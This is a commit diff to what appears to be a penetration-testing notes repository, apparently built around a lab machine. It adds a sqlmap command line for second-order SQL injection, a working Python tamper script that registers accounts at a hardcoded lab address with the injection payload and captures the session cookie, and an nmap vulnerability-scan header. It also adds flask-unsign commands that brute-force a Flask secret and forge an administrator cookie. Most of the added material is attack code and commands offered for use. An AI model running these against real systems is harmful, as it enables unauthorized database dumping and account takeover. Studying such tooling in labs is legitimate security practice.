sqli

Exploits/Databases/SQLmap.md

@@ -2,6 +2,7 @@
 
 
 * [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
+* [sqlmap usages](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
 * [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
 * [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
 
@@ -31,6 +32,22 @@ sqlmap -u http://<target-IP>/site.php --forms --dump-all
 |--tables|Show tables|
 |-T|Specify table|
 
+### Advanced Features
+
+#### Second Order SQL Injection 
+
+In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on [Le Thanh Phuc's blog](https://lethanhphuc-pk.medium.com/second-order-sql-injection-explained-with-example-f67fb199f5e5)
+
+
+An example oneliner including a tamper script and a first and second request captured in Burpsuite
+```sh
+sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql
+```
+The `second_order_tamper.py` can be found inside this repository. Users are created through this script by SQLmap to further login through `login.request` and read the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`.
+
+Dump the databases, tables afterwards
+
+
 ## Other Tools
 
 ### Damn Small SQLi Scanner (DSSS)

Exploits/Databases/nmap-full.xml

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Sat Feb 18 20:46:42 2023 as: nmap -p 8000 -oA nmap-full -sC -sV -&#45;script vuln 10.10.200.251 -->
+<nmaprun scanner="nmap" args="nmap -p 8000 -oA nmap-full -sC -sV -&#45;script vuln 10.10.200.251" start="1676749602" startstr="Sat Feb 18 20:46:42 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1" services="8000"/>

Exploits/Databases/second_order_tamper.py

@@ -0,0 +1,74 @@
+#!/usr/bin/env python
+
+'''
+The following line is an example on how to utilize the script 
+sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py \
+--second-req $(pwd)/second.req -p username --technique=U --dbms mysql
+'''
+
+import re
+import requests
+from lib.core.enums import PRIORITY  # Imported by SQLmap
+__priority__ = PRIORITY.NORMAL
+
+
+def dependencies():
+    '''
+    define dependencies
+    '''
+    pass
+
+
+URL = "http://10.10.212.150:8000"
+
+
+def login_account(payload):
+    '''
+    Create account and return the cookie
+    The SQLi is in the username field
+    '''
+    proxies = {'http': 'http://127.0.0.1:8080'}
+    #cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
+
+    params = {
+            "username": payload, #  random.randint(100000, 99999999),  # SQLi field
+            "email": "admin@admin.com",
+            "password": "password123"  # Needs to be similar to '-r req.txt'
+            }
+    url = f"{URL}/register"
+    _ = requests.post(
+        url, data=params, timeout=10,  # cookies=cookies,
+        verify=False, allow_redirects=True, proxies=proxies
+        )
+
+    url = f"{URL}/login"
+    response = requests.post(
+        url, timeout=10, data=params, # cookies=flask_cookie,
+        verify=False, allow_redirects=True, proxies=proxies
+        )
+
+    #print(response.headers)
+    flask_cookie = re.search(
+        'session=(.*?);', response.headers['Set-Cookie']).group(1)
+
+    # url = f"{URL}/logout"
+    # response = requests.post(
+    #     url, timeout=10, cookies=flask_cookie,
+    #     verify=False, allow_redirects=True, proxies=proxies
+    #     )
+
+    return f"session={flask_cookie}"
+
+
+def tamper(payload, **kwargs):
+    '''
+    The function used by SQLmap
+    '''
+    headers = kwargs.get("headers", {})
+    headers["Cookie"] = login_account(payload)
+    # login_account(payload)
+    return payload
+
+
+#if __name__ == "__main__":
+#    login_account("yo")

Exploits/Python/Flask Cookies.md

@@ -0,0 +1,25 @@
+# Flask Cookies
+
+They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key.
+Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.
+
+## Read Flask Cookie
+
+Using `flask-unsign` this can be done via
+```sh
+flask-unsign --decode --cookie '<COOKIE>'
+```
+
+## Unsign the Flask Cookie
+
+Unsigning the cookie can be done in the following way
+```sh
+flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval
+```
+
+## Sign the Flask Cookie
+
+Siging the cookie can be done via
+```sh
+flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'
+```